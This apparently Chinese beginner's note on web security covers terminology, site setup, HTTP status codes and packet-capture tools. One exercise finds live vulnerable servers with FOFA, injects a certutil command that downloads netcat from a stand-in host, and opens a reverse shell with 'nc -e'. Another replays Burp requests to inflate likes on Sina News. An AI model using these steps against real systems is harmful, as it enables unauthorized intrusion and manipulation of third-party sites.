常见名词
前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,
反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等
名词解释
小实战
-
在
fofa
暗网浏览器中,使用"pikachu" && country="CN" && title="Get the pikachu"
命令,查询在线pikachu服务器,进入测试命令执行漏洞 -
执行命令,查看回显
-
查看本机是哪种服务器,接着使用下载命令,将
远程连接nc
下载到本地,并命名为n.exe
文档下载命令转换 -
选择
CMD
下载命令,复制命令,使用命令执行127.0.0.1 & certutil.exe -urlcache -split -f http://www.xxx.com:80/nc.exe n.exe
,出现以下,表示下载完成,也可以使用dir查看 -
接着在想要反弹shell的电脑上使用命令
nc -lvvp 端口号(5566)
监听端口;在肉机上用nc -e /bin/sh(或cmd) 目标ip 5566
;成功连接上远端服务器。
网站搭建
Web应用&架构搭建&漏洞概念&HTTP
Web应用&架构
理解不同WEB应用组成角色功能架构:
开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等
开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等
程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等
中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等
数据库类型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等
服务器操作系统:Windows系列,Linux系列,Mac系列等
第三方软件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh等
小实战
一个好玩的东西,新浪新闻点赞,在不登陆的情况下只能点赞一次,究其原因应该是浏览器前端问题,可以刷新页面继续点赞,也可以截取数据包,多次发送就能解决仅能发送一次的问题。
- 已经点赞后,无论如何去点都无法再次增加点赞量,此时的点赞量为229。
-
开启
burpsuite
抓包,并右键送至中继器(repeater) -
关闭抓包,在repeater中继续send数据包,刷新网页查看点赞量,此时的点赞量已经到了250次了。
抓包模拟器
在PC端显现出来的浏览器与手机端浏览器显现出来的不同,使用burpsuite
抓包,观看数据包的区别。
- 在
burpsuite
中配置代理,其中127是本地浏览器抓包,10是对该计算机局域网内进行抓包(特指模拟器)
- 模拟器更改配置,
代理--手动
,代理服务器主机名
改为本机IP
地址,dialing端口与上述一致,为8888
,如下:
- 分别在PC端与模拟器上抓包,让数据流经burp抓包工具,如下:
通过User-Agent
可知其发生差异的原因
状态码返回值
参考文章1
参考文章2400
:发送请求有语法错误403
:文件夹存在,没有权限访问404
:访问资源不存在(文件/文件夹)3xx
:跳转,处置过程,判断可有可无
重定向(302)5xx
:内部错误,服务器问题,判断可有可无
500.服务器内部异常
504.服务器请求超时,没有返回结果
在对目标进行扫描时,尽量勾选它们,为了不放过任何结果,需要进行扫描
购买快代理
,可以随时更换ip,防止ip被封禁,也可以实现VPN的功效。
网站搭建
安装的前提条件:
- 拥有一台自己的服务器和属于自己的域名(域名要进行备案,如果不备案只能在大陆之外进行访问)
- 服务器安装宝塔集成环境,方便操作使用
- 选用远程连接工具,可以使用Windows自带的远程连接,也可以使用
FinalShell
进行连接,在远程服务器上进行操作
选择安装
选用Windows
搭建:
- 使用远端
mstsc
进行搭建,域名没有在国内备案,在阿里云选用大陆之外的云服务器
选用按量收费,双核4G,服务器选用Windows版本
- 确认下单之后,配置安全组,配置服务器密码,这些后期都能进行配置
- 在服务器上下载宝塔,需要注册,在域名处提前配置好,将域名访问映射到服务器的ip,宝塔账号密码是随机的
- 直接关掉该页面,会出现控制面板工具,复制面板地址到本机浏览器,开始网站的部署。
- 进入以下界面,可以选择傻瓜式安装,也可以自己进行配置安装,在软件商店中选择。
Win参考连接
Linux参考连接
WEB应用安全漏洞
Web应用安全漏洞分类
SQL注入,文件安全,RCE执行,XSS跨站,CSRF/SSRF/CRLF,
反序列化,逻辑越权,未授权访问,XXE/XML,弱口令安全等
安全漏洞解释
数据包&封包&信息收集
参考连接
抓包的意义: 在我们安全测试中,对方可能会提供相对应的ip 地址,域名等等,那么有的应用是不会给你的,当在你测试的时候是不知道对方的目标名字什么的,那么我们就可以通过抓取数据包来获得你想要的信息,例如,对方主机/ip,或者与其相关的信息。
抓包的对象: 那么抓包他主要是针对协议去抓取的,根据不同的协议配对不同的抓包工具,就好比我们的网站他可以用BURP抓包工具,那么我们的APP或者小程序,它就不行了我们的BURP就抓取不到,为什么,因为我们的APP/小程序他走的不是HTTP协议的,所有抓取不到。
抓包的协议: 抓包的协议呢,就是我们的APP,它也可以是HTTP协议的走向,因为我们的HTML5就能做出APP,那么我们HTML5他的走向协议就是http协议,那个APP点开其实就是打开网站了,你留心可以发现,网站有一些网站和我们点开APP十分像
抓包的支持: 其实就是目标他支持哪些抓包工具,支持哪些协议
封包的意义: 封包他就能自定义我们的一个数据包,封包技术说简单也不简单,就是将一系列操作封装为数据包,方便使用,很多我们的外挂都用到封包技术,就相当于说你自定义一个数据包封装发送给服务器
参考点
Fiddler:
是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件)。 Fiddler 要比其他的网络调试器要更加简单,因为它不仅仅暴露http通讯还提供了一个用户友好的格式。
手机证书安装,需要将防火墙关闭,安装证书步骤参考
Charles:
是一个HTTP代理服务器,HTTP监视器,反转代理服务器,当浏览器连接Charles的代理访问互联网时,Charles可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信,这些包括request, response和HTTP headers (包含cookies与caching信息)。
在模拟器中添加证书,help -->SSLproxying --> save Charles root certificate,保存之后,在模拟器中保存到文件夹中,接着设置-安全-(加密与凭据)用户凭据-从存储设备安装
/ 设置-WALN-更多WALN设置-安装证书
,接着会让输入密码,安装就能抓包。
抓取的包全部出现unknow的解决方法:
proxy --> SSL Proxying Settings --> Add
来添加主机和端口,
如果个别情况出现unknow,可能是本身抓包软件存在个别漏抓问题。可以忽略
从左到右分别为:
(1)清除当前会话
(2)开始记录
(3)开启SSL代理
(4)开始限流/停止限流
(5)开始断点/停止断点
(6)根据所写内容撰写新请求
(7)重发选定请求
(8)工具
(9)设置
Charles 激活码在线计算器
ios配置代理
ios下载证书问题
burp+逍遥模拟器 app抓包
TCPDump:
是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
BurpSuite:
是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。
Wireshark:
是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
WireShark使用教程
科来网络分析系统:
是一款由科来软件全自主研发,并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。
WPE&封包分析:
是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。
封包拦截器
封包监听工具
Charles (茶杯)
https://blog.csdn.net/weixin_45459427/article/details/108393878
Fidder
https://blog.csdn.net/weixin_45043349/article/details/120088449文章来源:https://www.toymoban.com/news/detail-762689.html
BurpSuite
https://blog.csdn.net/qq_36658099/article/details/81487491文章来源地址https://www.toymoban.com/news/detail-762689.html
到了这里,关于安全基础~信息收集1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!